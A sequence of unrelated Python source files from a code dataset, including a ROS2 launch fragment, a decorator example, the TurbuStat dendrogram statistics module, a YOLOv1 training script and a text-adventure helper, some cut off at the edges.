ComposableNode(
package = 'hello_world_cpp',
node_plugin = 'hello_world_cpp::Listener',
node_name = 'listener'
)
],
output = 'screen',
)
return launch.LaunchDescription([container])
| StarcoderdataPython |
8046504 | <reponame>Anancha/Programming-Techniques-using-Python
def mydecorator(myfunc):
def func1(myname):
if myname=="Michael":
print("Hello",myname,"!Your functionality is extended!")
else:
myfunc(myname)
return func1
@mydecorator
def greet(myname):
print("HI!",myname,"!Welcome to learning decorators!")
greet('Tom')
greet('Latham')
greet('Michael') | StarcoderdataPython |
11200918 | <reponame>fsi-sandbox/fsi-sdk-python
class Union:
def __init__(self, params):
self.url = params['base_url']
self.headers = {
"Sandbox-Key": params['Sandbox-Key'],
"Content-Type": params['Content-Type']
}
| StarcoderdataPython |
6660004 | # Licensed under an MIT open source license - see LICENSE
from __future__ import print_function, absolute_import, division
'''
Dendrogram statistics as described in Burkhart et al. (2013)
Two statistics are contained:
* number of leaves + branches vs. $\delta$ parameter
* statistical moments of the intensity histogram
Requires the astrodendro package (http://github.com/astrodendro/dendro-core)
'''
import numpy as np
from warnings import warn
import statsmodels.api as sm
from astropy.utils.console import ProgressBar
import warnings
try:
from astrodendro import Dendrogram, periodic_neighbours
astrodendro_flag = True
except ImportError:
Warning("Need to install astrodendro to use dendrogram statistics.")
astrodendro_flag = False
from ..stats_utils import hellinger, common_histogram_bins, standardize
from ..base_statistic import BaseStatisticMixIn
from ...io import common_types, threed_types, twod_types
from .mecdf import mecdf
class Dendrogram_Stats(BaseStatisticMixIn):
"""
Dendrogram statistics as described in Burkhart et al. (2013)
Two statistics are contained:
* number of leaves & branches vs. :math:`\delta` parameter
* statistical moments of the intensity histogram
Parameters
----------
data : %(dtypes)s
Data to create the dendrogram from.
min_deltas : {`~numpy.ndarray`, 'auto', None}, optional
Minimum deltas of leaves in the dendrogram. Multiple values must
be given in increasing order to correctly prune the dendrogram.
The default estimates delta levels from percentiles in the data.
dendro_params : dict
Further parameters for the dendrogram algorithm
(see www.dendrograms.org for more info).
num_deltas : int, optional
Number of min_delta values to use when `min_delta='auto'`.
"""
__doc__ %= {"dtypes": " or ".join(common_types + twod_types +
threed_types)}
def __init__(self, data, header=None, min_deltas='auto',
dendro_params=None, num_deltas=10):
super(Dendrogram_Stats, self).__init__()
if not astrodendro_flag:
raise ImportError("astrodendro must be installed to use "
"Dendrogram_Stats.")
self.input_data_header(data, header)
if dendro_params is None:
self.dendro_params = {"min_npix": 10,
"min_value": 0.001,
"min_delta": 0.1}
else:
self.dendro_params = dendro_params
if min_deltas == 'auto':
self.autoset_min_deltas(num=num_deltas)
else:
self.min_deltas = min_deltas
@property
def min_deltas(self):
'''
Array of min_delta values to compute the dendrogram.
'''
return self._min_deltas
@min_deltas.setter
def min_deltas(self, value):
# In the case where only one min_delta is given
if "min_delta" in self.dendro_params and value is None:
self._min_deltas = np.array([self.dendro_params["min_delta"]])
else:
# Multiple values given. Ensure they are in increasing order
if not (np.diff(value) > 0).all():
raise ValueError("Multiple values of min_delta must be given "
"in increasing order.")
if not isinstance(value, np.ndarray):
self._min_deltas = np.array([value])
else:
self._min_deltas = value
def autoset_min_deltas(self, num=10):
'''
Create an array delta values that the dendrogram will be pruned to.
Creates equally-spaced delta values between the minimum value set in
`~Dendrogram_Stats.dendro_params` and the maximum in the data. The last
delta (which would only occur at the peak in the data) is removed.
Parameters
----------
num : int, optional
Number of delta values to create.
'''
min_val = self.dendro_params.get('min_value', -np.inf)
min_delta = self.dendro_params.get('min_delta', 1e-5)
# Calculate the ptp above the min_val
ptp = np.nanmax(self.data[self.data > min_val]) - min_val
self.min_deltas = np.linspace(min_delta, ptp, num + 1)[:-1]
def compute_dendro(self, show_progress=False, save_dendro=False,
dendro_name=None, dendro_obj=None,
periodic_bounds=False):
'''
Compute the dendrogram and prune to the minimum deltas.
** min_deltas must be in ascending order! **
Parameters
----------
show_progress : optional, bool
Enables the progress bar in astrodendro.
save_dendro : optional, bool
Saves the dendrogram in HDF5 format. **Requires pyHDF5**
dendro_name : str, optional
Save name when save_dendro is enabled. ".hdf5" appended
automatically.
dendro_obj : Dendrogram, optional
Input a pre-computed dendrogram object. It is assumed that
the dendrogram has already been computed!
periodic_bounds : bool, optional
Enable when the data is periodic in the spatial dimensions.
'''
self._numfeatures = np.empty(self.min_deltas.shape, dtype=int)
self._values = []
if dendro_obj is None:
if periodic_bounds:
# Find the spatial dimensions
num_axes = self.data.ndim
spat_axes = []
for i, axis_type in enumerate(self._wcs.get_axis_types()):
if axis_type["coordinate_type"] == u"celestial":
spat_axes.append(num_axes - i - 1)
neighbours = periodic_neighbours(spat_axes)
else:
neighbours = None
d = Dendrogram.compute(self.data, verbose=show_progress,
min_delta=self.min_deltas[0],
min_value=self.dendro_params["min_value"],
min_npix=self.dendro_params["min_npix"],
neighbours=neighbours)
else:
d = dendro_obj
self._numfeatures[0] = len(d)
self._values.append(np.array([struct.vmax for struct in
d.all_structures]))
if len(self.min_deltas) > 1:
# Another progress bar for pruning steps
if show_progress:
print("Pruning steps.")
bar = ProgressBar(len(self.min_deltas[1:]))
for i, delta in enumerate(self.min_deltas[1:]):
d.prune(min_delta=delta)
self._numfeatures[i + 1] = len(d)
self._values.append(np.array([struct.vmax for struct in
d.all_structures]))
if show_progress:
bar.update(i + 1)
@property
def numfeatures(self):
'''
Number of branches and leaves at each value of min_delta
'''
return self._numfeatures
@property
def values(self):
'''
Array of peak intensity values of leaves and branches at all values of
min_delta.
'''
return self._values
def make_hists(self, min_number=10, **kwargs):
'''
Creates histograms based on values from the tree.
*Note:* These histograms are remade when calculating the distance to
ensure the proper form for the Hellinger distance.
Parameters
----------
min_number : int, optional
Minimum number of structures needed to create a histogram.
'''
hists = []
for value in self.values:
if len(value) < min_number:
hists.append([np.zeros((0, ))] * 2)
continue
if 'bins' not in kwargs:
bins = int(np.sqrt(len(value)))
else:
bins = kwargs['bins']
kwargs.pop('bins')
hist, bins = np.histogram(value, bins=bins, **kwargs)
bin_cents = (bins[:-1] + bins[1:]) / 2
hists.append([bin_cents, hist])
self._hists = hists
@property
def hists(self):
'''
Histogram values and bins computed from the peak intensity in all
structures. One set of values and bins are returned for each value
of `~Dendro_Statistics.min_deltas`
'''
return self._hists
def fit_numfeat(self, size=5, verbose=False):
'''
Fit a line to the power-law tail. The break is approximated using
a moving window, computing the standard deviation. A spike occurs at
the break point.
Parameters
----------
size : int. optional
Size of std. window. Passed to std_window.
verbose : bool, optional
Shows the model summary.
'''
if len(self.numfeatures) == 1:
raise ValueError("Multiple min_delta values must be provided to "
"perform fitting. Only one value was given.")
nums = self.numfeatures[self.numfeatures > 1]
deltas = self.min_deltas[self.numfeatures > 1]
# Find the position of the break
break_pos = std_window(nums, size=size)
self.break_pos = deltas[break_pos]
# Still enough point to fit to?
if len(deltas[break_pos:]) < 2:
raise ValueError("Too few points to fit. Try running with more "
"min_deltas or lowering the std. window size.")
# Remove points where there is only 1 feature or less.
self._fitvals = [np.log10(deltas[break_pos:]),
np.log10(nums[break_pos:])]
x = sm.add_constant(self.fitvals[0])
self._model = sm.OLS(self.fitvals[1], x).fit(cov_type='HC3')
if verbose:
print(self.model.summary())
errors = self.model.bse
self._tail_slope = self.model.params[-1]
self._tail_slope_err = errors[-1]
@property
def model(self):
'''
Power-law tail fit model.
'''
return self._model
@property
def fitvals(self):
'''
Log values of delta and number of structures used for the power-law
tail fit.
'''
return self._fitvals
@property
def tail_slope(self):
'''
Slope of power-law tail.
'''
return self._tail_slope
@property
def tail_slope_err(self):
'''
1-sigma error on slope of power-law tail.
'''
return self._tail_slope_err
@staticmethod
def load_dendrogram(hdf5_file, min_deltas=None):
'''
Load in a previously saved dendrogram. **Requires pyHDF5**
Parameters
----------
hdf5_file : str
Name of saved file.
min_deltas : numpy.ndarray or list
Minimum deltas of leaves in the dendrogram.
'''
dendro = Dendrogram.load_from(hdf5_file)
self = Dendrogram_Stats(dendro.data, min_deltas=min_deltas,
dendro_params=dendro.params)
return self
def plot_fit(self, save_name=None, show_hists=True, color='r',
fit_color='k', symbol='o'):
'''
Parameters
----------
save_name : str,optional
Save the figure when a file name is given.
xunit : u.Unit, optional
The unit to show the x-axis in.
show_hists : bool, optional
Plot the histograms of intensity. Requires
`~Dendrogram_Stats.make_hists` to be run first.
color : {str, RGB tuple}, optional
Color to show the delta-variance curve in.
fit_color : {str, RGB tuple}, optional
Color of the fitted line. Defaults to `color` when no input is
given.
'''
import matplotlib.pyplot as plt
if not show_hists:
ax1 = plt.subplot(111)
else:
ax1 = plt.subplot(121)
if fit_color is None:
fit_color = color
ax1.plot(self.fitvals[0], self.fitvals[1], symbol, color=color)
ax1.plot(self.fitvals[0], self.model.fittedvalues, color=fit_color)
plt.xlabel(r"log $\delta$")
plt.ylabel(r"log Number of Features")
if show_hists:
ax2 = plt.subplot(122)
if not hasattr(self, "_hists"):
raise ValueError("Histograms were not computed with "
"Dendrogram_Stats.make_hists. Cannot plot.")
for bins, vals in self.hists:
if bins.size < 1:
continue
bin_width = np.abs(bins[1] - bins[0])
ax2.bar(bins, vals, align="center",
width=bin_width, alpha=0.25,
color=color)
plt.xlabel("Data Value")
plt.tight_layout()
if save_name is not None:
plt.savefig(save_name)
plt.close()
else:
plt.show()
def run(self, periodic_bounds=False, verbose=False, save_name=None,
show_progress=True, dendro_obj=None, save_results=False,
output_name=None, fit_kwargs={}, make_hists=True, hist_kwargs={}):
'''
Compute dendrograms. Necessary to maintain the package format.
Parameters
----------
periodic_bounds : bool or list, optional
Enable when the data is periodic in the spatial dimensions. Passing
a two-element list can be used to individually set how the
boundaries are treated for the datasets.
verbose : optional, bool
Enable plotting of results.
save_name : str,optional
Save the figure when a file name is given.
show_progress : optional, bool
Enables progress bars while making the dendrogram.
dendro_obj : Dendrogram, optional
Pass a pre-computed dendrogram object. **MUST have min_delta set
at or below the smallest value in`~Dendro_Statistics.min_deltas`.**
save_results : bool, optional
Save the statistic results as a pickle file. See
`~Dendro_Statistics.save_results`.
output_name : str, optional
Filename used when `save_results` is enabled. Must be given when
saving.
fit_kwargs : dict, optional
Passed to `~Dendro_Statistics.fit_numfeat`.
make_hists : bool, optional
Enable computing histograms.
hist_kwargs : dict, optional
Passed to `~Dendro_Statistics.make_hists`.
'''
self.compute_dendro(show_progress=show_progress, dendro_obj=dendro_obj,
periodic_bounds=periodic_bounds)
self.fit_numfeat(verbose=verbose, **fit_kwargs)
if make_hists:
self.make_hists(**hist_kwargs)
if verbose:
self.plot_fit(save_name=save_name, show_hists=make_hists)
if save_results:
self.save_results(output_name=output_name)
class Dendrogram_Distance(object):
"""
Calculate the distance between 2 cubes using dendrograms. The number of
features vs. minimum delta is fit to a linear model, with an interaction
term to gauge the difference. The distance is the t-statistic of that
parameter. The Hellinger distance is computed for the histograms at each
minimum delta value. The distance is the average of the Hellinger
distances.
.. note:: When passing a computed `~DeltaVariance` class for `dataset1`
or `dataset2`, it may be necessary to recompute the
dendrogram if `~Dendrogram_Stats.min_deltas` does not equal
`min_deltas` generated here (or passed as kwarg).
Parameters
----------
dataset1 : %(dtypes)s or `~Dendrogram_Stats`
Data cube or 2D image. Or pass a
`~Dendrogram_Stats` class that may be pre-computed.
where the dendrogram statistics are saved.
dataset2 : %(dtypes)s or `~Dendrogram_Stats`
See `dataset1` above.
min_deltas : numpy.ndarray or list
Minimum deltas (branch heights) of leaves in the dendrogram. The set
of dendrograms must be computed with the same minimum branch heights.
nbins : str or float, optional
Number of bins for the histograms. 'best' sets
that number using the square root of the average
number of features between the histograms to be
compared.
min_features : int, optional
The minimum number of features (branches and leaves) for the histogram
be used in the histogram distance.
dendro_params : dict or list of dicts, optional
Further parameters for the dendrogram algorithm
(see the `astrodendro documentation <dendrograms.readthedocs.io>`_
for more info). If a list of dictionaries is
given, the first list entry should be the dictionary for `dataset1`,
and the second for `dataset2`.
dendro_kwargs : dict, optional
Passed to `~turbustat.statistics.Dendrogram_Stats.run`.
dendro2_kwargs : None, dict, optional
Passed to `~turbustat.statistics.Dendrogram_Stats.run` for `dataset2`.
When `None` is given, parameters given in `dendro_kwargs` will be used
for both datasets.
"""
__doc__ %= {"dtypes": " or ".join(common_types + twod_types +
threed_types)}
def __init__(self, dataset1, dataset2, min_deltas=None, nbins="best",
min_features=100, dendro_params=None,
dendro_kwargs={}, dendro2_kwargs=None):
if not astrodendro_flag:
raise ImportError("astrodendro must be installed to use "
"Dendrogram_Stats.")
self.nbins = nbins
if min_deltas is None:
# min_deltas = np.append(np.logspace(-1.5, -0.7, 8),
# np.logspace(-0.6, -0.35, 10))
warnings.warn("Using default min_deltas ranging from 10^-2.5 to"
"10^0.5. Check whether this range is appropriate"
" for your data.")
min_deltas = np.logspace(-2.5, 0.5, 100)
if dendro_params is not None:
if isinstance(dendro_params, list):
dendro_params1 = dendro_params[0]
dendro_params2 = dendro_params[1]
elif isinstance(dendro_params, dict):
dendro_params1 = dendro_params
dendro_params2 = dendro_params
else:
raise TypeError("dendro_params is a {}. It must be a dictionary"
", or a list containing a dictionary entries."
.format(type(dendro_params)))
else:
dendro_params1 = None
dendro_params2 = None
if dendro2_kwargs is None:
dendro2_kwargs = dendro_kwargs
# if fiducial_model is not None:
# self.dendro1 = fiducial_model
# elif isinstance(dataset1, str):
# self.dendro1 = Dendrogram_Stats.load_results(dataset1)
if isinstance(dataset1, Dendrogram_Stats):
self.dendro1 = dataset1
# Check if we need to re-run the stat
has_slope = hasattr(self.dendro1, "_tail_slope")
match_deltas = (self.dendro1.min_deltas == min_deltas).all()
if not has_slope or not match_deltas:
warn("Dendrogram_Stats needs to be re-run for dataset1 "
"to compute the slope or have the same set of "
"`min_deltas`.")
dendro_kwargs.pop('make_hists', None)
dendro_kwargs.pop('verbose', None)
self.dendro1.run(verbose=False, make_hists=False,
**dendro_kwargs)
else:
self.dendro1 = Dendrogram_Stats(dataset1, min_deltas=min_deltas,
dendro_params=dendro_params1)
dendro_kwargs.pop('make_hists', None)
dendro_kwargs.pop('verbose', None)
self.dendro1.run(verbose=False, make_hists=False,
**dendro_kwargs)
# if isinstance(dataset2, str):
# self.dendro2 = Dendrogram_Stats.load_results(dataset2)
if isinstance(dataset2, Dendrogram_Stats):
self.dendro2 = dataset2
# Check if we need to re-run the stat
has_slope = hasattr(self.dendro2, "_tail_slope")
match_deltas = (self.dendro2.min_deltas == min_deltas).all()
if not has_slope or not match_deltas:
warn("Dendrogram_Stats needs to be re-run for dataset2 "
"to compute the slope or have the same set of "
"`min_deltas`.")
dendro_kwargs.pop('make_hists', None)
dendro_kwargs.pop('verbose', None)
self.dendro2.run(verbose=False, make_hists=False,
**dendro2_kwargs)
else:
self.dendro2 = \
Dendrogram_Stats(dataset2, min_deltas=min_deltas,
dendro_params=dendro_params2)
dendro_kwargs.pop('make_hists', None)
dendro_kwargs.pop('verbose', None)
self.dendro2.run(verbose=False, make_hists=False,
**dendro2_kwargs)
# Set the minimum number of components to create a histogram
cutoff1 = np.argwhere(self.dendro1.numfeatures > min_features)
cutoff2 = np.argwhere(self.dendro2.numfeatures > min_features)
if cutoff1.any():
cutoff1 = cutoff1[-1]
else:
raise ValueError("The dendrogram from dataset1 does not contain the"
" necessary number of features, %s. Lower"
" min_features or alter min_deltas."
% (min_features))
if cutoff2.any():
cutoff2 = cutoff2[-1]
else:
raise ValueError("The dendrogram from dataset2 does not contain the"
" necessary number of features, %s. Lower"
" min_features or alter min_deltas."
% (min_features))
self.cutoff = np.min([cutoff1, cutoff2])
@property
def num_distance(self):
'''
Distance between slopes from the for to the
log Number of features vs. branch height.
'''
return self._num_distance
def numfeature_stat(self, verbose=False,
save_name=None, plot_kwargs1={},
plot_kwargs2={}):
'''
Calculate the distance based on the number of features statistic.
Parameters
----------
verbose : bool, optional
Enables plotting.
save_name : str, optional
Saves the plot when a filename is given.
plot_kwargs1 : dict, optional
Set the color, symbol, and label for dataset1
(e.g., plot_kwargs1={'color': 'b', 'symbol': 'D', 'label': '1'}).
plot_kwargs2 : dict, optional
Set the color, symbol, and label for dataset2.
'''
self._num_distance = \
np.abs(self.dendro1.tail_slope - self.dendro2.tail_slope) / \
np.sqrt(self.dendro1.tail_slope_err**2 +
self.dendro2.tail_slope_err**2)
if verbose:
import matplotlib.pyplot as plt
defaults1 = {'color': 'b', 'symbol': 'D', 'label': '1'}
defaults2 = {'color': 'g', 'symbol': 'o', 'label': '2'}
for key in defaults1:
if key not in plot_kwargs1:
plot_kwargs1[key] = defaults1[key]
for key in defaults2:
if key not in plot_kwargs2:
plot_kwargs2[key] = defaults2[key]
if 'xunit' in plot_kwargs1:
del plot_kwargs1['xunit']
if 'xunit' in plot_kwargs2:
del plot_kwargs2['xunit']
plt.figure()
# Dendrogram 1
plt.plot(self.dendro1.fitvals[0], self.dendro1.fitvals[1],
plot_kwargs1['symbol'], label=plot_kwargs1['label'],
color=plot_kwargs1['color'])
plt.plot(self.dendro1.fitvals[0], self.dendro1.model.fittedvalues,
plot_kwargs1['color'])
# Dendrogram 2
plt.plot(self.dendro2.fitvals[0], self.dendro2.fitvals[1],
plot_kwargs2['symbol'], label=plot_kwargs2['label'],
color=plot_kwargs2['color'])
plt.plot(self.dendro2.fitvals[0], self.dendro2.model.fittedvalues,
plot_kwargs2['color'])
plt.grid(True)
plt.xlabel(r"log $\delta$")
plt.ylabel("log Number of Features")
plt.legend(loc='best')
plt.tight_layout()
if save_name is not None:
plt.savefig(save_name)
plt.close()
else:
plt.show()
return self
@property
def histogram_distance(self):
return self._histogram_distance
def histogram_stat(self, verbose=False,
save_name=None,
plot_kwargs1={},
plot_kwargs2={}):
'''
Computes the distance using histograms.
Parameters
----------
verbose : bool, optional
Enables plotting.
save_name : str, optional
Saves the plot when a filename is given.
plot_kwargs1 : dict, optional
Set the color, symbol, and label for dataset1
(e.g., plot_kwargs1={'color': 'b', 'symbol': 'D', 'label': '1'}).
plot_kwargs2 : dict, optional
Set the color, symbol, and label for dataset2.
'''
if self.nbins == "best":
self.nbins = [np.floor(np.sqrt((n1 + n2) / 2.)) for n1, n2 in
zip(self.dendro1.numfeatures[:self.cutoff],
self.dendro2.numfeatures[:self.cutoff])]
else:
self.nbins = [self.nbins] * \
len(self.dendro1.numfeatures[:self.cutoff])
self.nbins = np.array(self.nbins, dtype=int)
self.histograms1 = \
np.empty((len(self.dendro1.numfeatures[:self.cutoff]),
np.max(self.nbins)))
self.histograms2 = \
np.empty((len(self.dendro2.numfeatures[:self.cutoff]),
np.max(self.nbins)))
self.bins = []
for n, (data1, data2, nbin) in enumerate(
zip(self.dendro1.values[:self.cutoff],
self.dendro2.values[:self.cutoff], self.nbins)):
stand_data1 = standardize(data1)
stand_data2 = standardize(data2)
bins = common_histogram_bins(stand_data1, stand_data2,
nbins=nbin + 1)
self.bins.append(bins)
hist1 = np.histogram(stand_data1, bins=bins,
density=True)[0]
self.histograms1[n, :] = \
np.append(hist1, (np.max(self.nbins) -
bins.size + 1) * [np.NaN])
hist2 = np.histogram(stand_data2, bins=bins,
density=True)[0]
self.histograms2[n, :] = \
np.append(hist2, (np.max(self.nbins) -
bins.size + 1) * [np.NaN])
# Normalize
self.histograms1[n, :] /= np.nansum(self.histograms1[n, :])
self.histograms2[n, :] /= np.nansum(self.histograms2[n, :])
self.mecdf1 = mecdf(self.histograms1)
self.mecdf2 = mecdf(self.histograms2)
self._histogram_distance = hellinger_stat(self.histograms1,
self.histograms2)
if verbose:
import matplotlib.pyplot as plt
defaults1 = {'color': 'b', 'symbol': 'D', 'label': '1'}
defaults2 = {'color': 'g', 'symbol': 'o', 'label': '2'}
for key in defaults1:
if key not in plot_kwargs1:
plot_kwargs1[key] = defaults1[key]
for key in defaults2:
if key not in plot_kwargs2:
plot_kwargs2[key] = defaults2[key]
if 'xunit' in plot_kwargs1:
del plot_kwargs1['xunit']
if 'xunit' in plot_kwargs2:
del plot_kwargs2['xunit']
plt.figure()
ax1 = plt.subplot(2, 2, 1)
ax1.set_title(plot_kwargs1['label'])
ax1.set_ylabel("ECDF")
for n in range(len(self.dendro1.min_deltas[:self.cutoff])):
ax1.plot((self.bins[n][:-1] + self.bins[n][1:]) / 2,
self.mecdf1[n, :][:self.nbins[n]],
plot_kwargs1['symbol'],
color=plot_kwargs1['color'])
ax1.axes.xaxis.set_ticklabels([])
ax2 = plt.subplot(2, 2, 2)
ax2.set_title(plot_kwargs2['label'])
ax2.axes.xaxis.set_ticklabels([])
ax2.axes.yaxis.set_ticklabels([])
for n in range(len(self.dendro2.min_deltas[:self.cutoff])):
ax2.plot((self.bins[n][:-1] + self.bins[n][1:]) / 2,
self.mecdf2[n, :][:self.nbins[n]],
plot_kwargs2['symbol'],
color=plot_kwargs2['color'])
ax3 = plt.subplot(2, 2, 3)
ax3.set_ylabel("PDF")
for n in range(len(self.dendro1.min_deltas[:self.cutoff])):
bin_width = self.bins[n][1] - self.bins[n][0]
ax3.bar((self.bins[n][:-1] + self.bins[n][1:]) / 2,
self.histograms1[n, :][:self.nbins[n]],
align="center", width=bin_width, alpha=0.25,
color=plot_kwargs1['color'])
ax3.set_xlabel("z-score")
ax4 = plt.subplot(2, 2, 4)
for n in range(len(self.dendro2.min_deltas[:self.cutoff])):
bin_width = self.bins[n][1] - self.bins[n][0]
ax4.bar((self.bins[n][:-1] + self.bins[n][1:]) / 2,
self.histograms2[n, :][:self.nbins[n]],
align="center", width=bin_width, alpha=0.25,
color=plot_kwargs2['color'])
ax4.set_xlabel("z-score")
ax4.axes.yaxis.set_ticklabels([])
plt.tight_layout()
if save_name is not None:
plt.savefig(save_name)
plt.close()
else:
plt.show()
return self
def distance_metric(self, verbose=False, save_name=None,
plot_kwargs1={}, plot_kwargs2={}):
'''
Calculate both distance metrics.
Parameters
----------
verbose : bool, optional
Enables plotting.
save_name : str, optional
Save plots by passing a file name. `hist_distance` and
`num_distance` will be appended to the file name to distinguish
the plots made with the two metrics.
plot_kwargs1 : dict, optional
Set the color, symbol, and label for dataset1
(e.g., plot_kwargs1={'color': 'b', 'symbol': 'D', 'label': '1'}).
plot_kwargs2 : dict, optional
Set the color, symbol, and label for dataset2.
'''
if save_name is not None:
import os
# Distinguish name for the two plots
base_name, extens = os.path.splitext(save_name)
save_name_hist = "{0}.hist_distance{1}".format(base_name, extens)
save_name_num = "{0}.num_distance{1}".format(base_name, extens)
else:
save_name_hist = None
save_name_num = None
self.histogram_stat(verbose=verbose, plot_kwargs1=plot_kwargs1,
plot_kwargs2=plot_kwargs2,
save_name=save_name_hist)
self.numfeature_stat(verbose=verbose, plot_kwargs1=plot_kwargs1,
plot_kwargs2=plot_kwargs2,
save_name=save_name_num)
return self
def DendroDistance(*args, **kwargs):
'''
Old name for the Dendrogram_Distance class.
'''
warn("Use the new 'Dendrogram_Distance' class. 'DendroDistance' is deprecated and will"
" be removed in a future release.", Warning)
return Dendrogram_Distance(*args, **kwargs)
def hellinger_stat(x, y):
'''
Compute the Hellinger statistic of multiple samples.
'''
assert x.shape == y.shape
if len(x.shape) == 1:
return hellinger(x, y)
else:
dists = np.empty((x.shape[0], 1))
for n in range(x.shape[0]):
dists[n, 0] = hellinger(x[n, :], y[n, :])
return np.mean(dists)
def std_window(y, size=5, return_results=False):
'''
Uses a moving standard deviation window to find where the powerlaw break
is.
Parameters
----------
y : np.ndarray
Data.
size : int, optional
Odd integer which sets the window size.
return_results : bool, optional
If enabled, returns the results of the window. Otherwise, only the
position of the break is returned.
'''
half_size = (size - 1) // 2
shape = max(y.shape)
stds = np.empty((shape - size + 1))
for i in range(half_size, shape - half_size):
stds[i - half_size] = np.std(y[i - half_size: i + half_size])
# Now find the max
break_pos = np.argmax(stds) + half_size
if return_results:
return break_pos, stds
return break_pos
| StarcoderdataPython |
226020 | """
Name : c8_08_python_hierachical.py
Book : Hands-on Data Science with Anaconda )
Publisher: Packt Publishing Ltd.
Author : <NAME> and <NAME>
Date : 3/25/2018
email : <EMAIL>
<EMAIL>
"""
import numpy as np
import scipy.cluster.hierarchy as hac
import matplotlib.pyplot as plt
#
n=100
x=np.random.normal(0,8,n)
y=np.random.normal(10,8,n)
a = [x,y]
z = hac.linkage(a, method='single')
plt. | StarcoderdataPython |
1880446 | import sys
# Functions for PHS Adventure.
def get_choice(choices):
# This function takes in a dictionary of choices,
# and returns the user's choice.
# The dictionary has the form:
# {'choice_token': 'choice text', }
# The function forces the user to make one of the given choices,
# or quit.
print("\nWould you like to: ")
for choice_token in choices:
print("[%s]: %s" % (choice_token, choices[choice_token]))
# Always offer the choice to quit.
print("[q]: Quit.")
choice_token = ''
while choice_token not in choices.keys():
choice_token = input("\nWhat is your choice? ")
choice_token = str(choice_token)
if choice_token == 'q':
print("Thanks for playing! Bye.")
sys.exit()
return choice_token
| StarcoderdataPython |
6662791 | import os
import time
import torch
import argparse
from models.model import YOLOv1
import matplotlib.pyplot as plt
from torchvision import utils
from torch.optim import SGD, Adam
# from torchviz import make_dot
from models import build_model
from utils.util import YOLOLoss, parse_cfg
from utils.datasets import create_dataloader
def train(model, train_loader, optimizer, epoch, device, train_loss_lst):
model.train() # Set the module in training mode
train_loss = 0
for batch_idx, (inputs, labels) in enumerate(train_loader):
inputs, labels = inputs.to(device), labels.to(device)
# foward prop
outputs = model(inputs)
# back prop
optimizer.zero_grad()
criterion = YOLOLoss()
loss = criterion(outputs, labels)
train_loss += loss.item()
loss.backward()
optimizer.step()
# show batch0 dataset
if batch_idx == 0 and epoch == 0:
fig = plt.figure()
inputs = inputs.cpu() # convert to cpu
grid = utils.make_grid(inputs)
plt.imshow(grid.numpy().transpose((1, 2, 0)))
plt.show()
# print loss and accuracy
if (batch_idx+1) % 2 == 0:
print('Train Epoch: {} [{}/{} ({:.1f}%)] Loss: {:.6f}'
.format(epoch, batch_idx * len(inputs), len(train_loader.dataset),
100. * batch_idx / len(train_loader), loss.item()))
# record training loss
train_loss /= len(train_loader)
train_loss_lst.append(train_loss)
return train_loss_lst
def validate(model, val_loader, device, val_loss_lst):
model.eval() # Sets the module in evaluation mode
val_loss = 0
# no need to calculate gradients
with torch.no_grad():
for data, target in val_loader:
data, target = data.to(device), target.to(device)
output = model(data)
# add one batch loss
criterion = YOLOLoss()
val_loss += criterion(output, target).item()
val_loss /= len(val_loader)
print('\nVal set: Average loss: {:.4f}'.format(val_loss))
# record validating loss
val_loss_lst.append(val_loss)
return val_loss_lst
def test(model, test_loader, device):
model.eval() # Sets the module in evaluation mode
test_loss = 0
# no need to calculate gradients
with torch.no_grad():
for data, target in test_loader:
data, target = data.to(device), target.to(device)
output = model(data)
# add one batch loss
criterion = YOLOLoss()
test_loss += criterion(output, target).item()
# record testing loss
test_loss /= len(test_loader)
print('Test set: Average loss: {:.4f}'.format(test_loss))
def arg_parse():
"""
Parse arguements to the detect module
"""
parser = argparse.ArgumentParser(description='Food Recognition System')
parser.add_argument("--cfg", "-c", dest='cfg', default="cfg/yolov1.cfg",
help="Your yolo config file path", type=str)
parser.add_argument("--data", "-d", dest='data', default="cfg/dataset.cfg",
help="Your dataset config file path", type=str)
parser.add_argument("--weights", "-w", dest='weights', default="",
help="Path of pretrained weights", type=str)
parser.add_argument("--output", "-o", dest='output', default="output",
help="Output file path", type=str)
parser.add_argument("--epochs", "-e", dest='epochs', default=100,
help="Training epochs", type=int)
parser.add_argument("--lr", "-lr", dest='lr', default=0.0002,
help="Training learning rate", type=float)
parser.add_argument("--batch_size", "-b", dest='batch_size', default=32,
help="Training batch size", type=int)
parser.add_argument("--input_size", "-i", dest='input_size', default=448,
help="Image input size", type=int)
parser.add_argument("--save_freq", "-s", dest='save_freq', default=25,
help="Frequency of saving model checkpoints when training", type=int)
return parser.parse_args()
if __name__ == "__main__":
args = arg_parse()
cfg, data, weights, output = args.cfg, args.data, args.weights, args.output
epochs, lr, batch_size, input_size, save_freq = args.epochs, args.lr, args.batch_size, args.input_size, args.save_freq
cfg = parse_cfg(cfg)
data_cfg = parse_cfg(data)
img_path, label_path = data_cfg['dataset'], data_cfg['label']
# load dataset and dataloader
train_loader, val_loader, test_loader = create_dataloader(img_path, label_path,
0.8, 0.1, 0.1, batch_size, input_size)
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
# device = "cpu"
# build model
model = build_model(weights, cfg).to(device)
# plot model structure
# graph = make_dot(model(torch.rand(1, 3, input_size, input_size).cuda()),
# params=dict(model.named_parameters()))
# graph.render('model_structure', './', cleanup=True, format='png')
optimizer = SGD(model.parameters(), lr=lr, momentum=0.9)
# optimizer = Adam(model.parameters(), lr=lr)
# create output file folder
start = time.strftime('%Y-%m-%d-%H-%M-%S', time.localtime(time.time()))
os.makedirs(os.path.join(output, start))
# loss list
train_loss_lst, val_loss_lst = [], []
# train epoch
for epoch in range(epochs):
train_loss_lst = train(model, train_loader,
optimizer, epoch, device, train_loss_lst)
val_loss_lst = validate(model, val_loader, device, val_loss_lst)
# save model weights every save_freq epoch
if epoch % save_freq == 0:
torch.save(model.state_dict(), os.path.join(
output, start, 'epoch'+str(epoch)+'.pth'))
test(model, test_loader, device)
# save model
torch.save(model.state_dict(), os.path.join(output, start, 'last.pth'))
# plot loss, save params change
fig = plt.figure()
plt.plot(range(epochs), train_loss_lst, 'g', label='train loss')
plt.plot(range(epochs), val_loss_lst, 'k', label='val loss')
plt.grid(True)
plt.xlabel('epoch')
plt.ylabel('acc-loss')
plt.legend(loc="upper right")
now = time.strftime('%Y-%m-%d-%H-%M-%S', time.localtime(time.time()))
plt.savefig(os.path.join(output, start, now + '.jpg'))
plt.show()
| StarcoderdataPython |
4803401 | <gh_stars>1-10
#!/usr/bin/env python3
""""
Script that prints graph.
Usage:
python print_graph.py
-e (comma separated input files(each file is an output of script: compute_evaluation.py or
run_all_scrips.py))
-n (comma separated nicknames - for each input file there must be its nickname, that will
